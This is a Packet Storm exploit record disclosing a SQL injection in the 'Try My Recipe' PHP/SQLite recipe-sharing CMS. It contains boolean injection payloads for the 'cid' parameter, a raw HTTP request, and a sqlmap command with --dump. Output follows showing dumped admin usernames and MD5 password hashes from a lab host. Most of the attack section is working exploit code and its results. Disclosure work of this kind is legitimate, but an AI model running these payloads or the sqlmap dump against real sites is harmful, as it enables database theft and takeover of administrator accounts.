Try My Recipe SQL Injection

2021-10-05T00:00:00

Description

{"id": "PACKETSTORM:164397", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Try My Recipe SQL Injection", "description": "", "published": "2021-10-05T00:00:00", "modified": "2021-10-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/164397/Try-My-Recipe-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-05T15:04:09", "viewCount": 90, "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/164397/trymyrecipe-sql.txt", "sourceData": "`https://www.sourcecodester.com/php/14964/try-my-recipe-recipe-sharing-website-cms-php-and-sqlite-free-source-code.html \n \n## [CVE-nu11-17-092921](https://www.sourcecodester.com/php/14964/try-my-recipe-recipe-sharing-website-cms-php-and-sqlite-free-source-code.html) \n## [Vendor](https://www.sourcecodester.com/users/tips23) \n![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/CVE-nu11-17-092921/docs/view_recipe_content.png) \n \n## MySQL Vulnerability Description: \nThe `cid` parameter appears on Recipe Sharing Website - CMS \n(by:oretnom23) to be vulnerable to SQL injection attacks. The payloads \n12345678' or '7775'='7775 and 77335599' or '5533'='5577 were each \nsubmitted in the `cid` parameter. These two requests resulted in \ndifferent responses, indicating that the input is being incorporated \ninto a SQL query in an unsafe way. \nThe attacker can dump information about users and their passwords. \nThen he can take control of their accounts. \n \n- MySQL Request: \n \n```cmd \nGET /recipe_site/?page=recipe&cid=12345678'%20or%20'7775'%3d'7775 HTTP/1.1 \nHost: 192.168.1.180 \nCookie: PHPSESSID=v4f40h5nvo41f7t5j0jg8f7pvd \nUpgrade-Insecure-Requests: 1 \nReferer: http://192.168.1.180/recipe_site/ \nAccept-Encoding: gzip, deflate \nAccept: */* \nAccept-Language: en-US,en-GB;q=0.9,en;q=0.8 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) \nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 \nSafari/537.36 \nConnection: close \nCache-Control: max-age=0 \n``` \n \n- MySQL Response: \n \n```cmd \nHTTP/1.1 200 OK \nDate: Wed, 29 Sep 2021 07:50:44 GMT \nServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22 \nX-Powered-By: PHP/7.4.22 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate \nPragma: no-cache \nConnection: close \nContent-Type: text/html; charset=UTF-8 \nContent-Length: 13306 \n \n<br /> \n<b>Warning</b>: SQLite3::exec(): database is locked in \n<b>C:\\xampp\\htdocs\\recipe_site\\DBConnection.php</b> on line \n<b>76</b><br /> \n<br /> \n<b>Warning</b>: SQLite3::exec(): database is locked i \n...[SNIP]... \n<div class=\"item col wow bounceInUp\"> \n...[SNIP]... \n<div class=\"card shadow-sm \"> \n...[SNIP]... \n<div class=\"card-body \"> \n...[SNIP]... \n<h5 class=\"card-title mb-1\">Sample Recipe 102</h5> \n...[SNIP]... \n<hr class=\"bg-primary opacity-100\"> \n...[SNIP]... \n<p class=\"truncate-3 fw-light fst-italic lh-1\" title=\"Class aptent \ntaciti sociosqu ad litora torquent per conubia nostra, per inceptos \nhimenaeos. Etiam hendrerit tellus in nisi semper vulputate. Curabitur \naccumsan metus sit amet erat volutpat, pl \n...[SNIP]... \n<div class=\"w-100 d-flex justify-content-end\"> \n...[SNIP]... \n<div class=\"col-auto flex-grow-1\"> \n...[SNIP]... \n<div class=\"text-muted truncate-1\" title=\"Claire Blake\"> \n...[SNIP]... \n<div class=\"col-auto\"> \n...[SNIP]... \n<a href=\"./?page=view_recipe&rid=2\" class=\"btn btn-sm btn-primary \nbg-gradient rounded-0 py-0\">View Recipes</a> \n...[SNIP]... \n<div class=\"item col wow bounceInUp\"> \n...[SNIP]... \n<div class=\"card shadow-sm \"> \n...[SNIP]... \n<div class=\"card-body \"> \n...[SNIP]... \n<h5 class=\"card-title mb-1\">Sample Menu</h5> \n...[SNIP]... \n<hr class=\"bg-primary opacity-100\"> \n...[SNIP]... \n<p class=\"truncate-3 fw-light fst-italic lh-1\" title=\"Lorem ipsum \ndolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed \nporttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus \nat odio. Proin elementum convallis leo at \n...[SNIP]... \n<div class=\"w-100 d-flex justify-content-end\"> \n...[SNIP]... \n<div class=\"col-auto flex-grow-1\"> \n...[SNIP]... \n<div class=\"text-muted truncate-1\" title=\"Try My Recipe Mgt\"> \n...[SNIP]... \n<div class=\"col-auto\"> \n...[SNIP]... \n<a href=\"./?page=view_recipe&rid=1\" class=\"btn btn-sm btn-primary \nbg-gradient rounded-0 py-0\">View Recipes</a> \n...[SNIP]... \n``` \n \n- The PoC: \n \n```cmd \npython sqlmap.py -u \n\"http://192.168.1.180/recipe_site/?page=view_recipe&rid=2\" \n--data=\"username=PWNED&password=password\" \n--cookie=\"PHPSESSID=v4f40h5nvo41f7t5j0jg8f7pvd\" --batch \n--answers=\"crack=N,dict=N,continue=Y,quit=N\" --dump \n``` \n- Output from the PoC: \n \n- dump \n \nTable: admin_list \n[2 entries] \n+----------+------+--------+---------------+----------------------------------+-----------+---------------------+ \n| admin_id | type | status | fullname | password \n| username | date_created | \n+----------+------+--------+---------------+----------------------------------+-----------+---------------------+ \n| 1 | 1 | 1 | Administrator | \n0192023a7bbd73250516f069df18b500 | admin | 2021-09-28 01:54:24 | \n| 2 | 2 | 1 | Mike Williams | \na88df23ac492e6e2782df6586a0c645f | mwilliams | 2021-09-28 08:00:51 | \n+----------+------+--------+---------------+----------------------------------+-----------+---------------------+ \n \n# BR \n \n \nSystem Administrator - Infrastructure Engineer \nPenetration Testing Engineer \nExploit developer at https://www.exploit-db.com/ \nhttps://www.nu11secur1ty.com/ \nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= \nnu11secur1ty <http://nu11secur1ty.com/> \n`\n", "_state": {"dependencies": 1646047292}}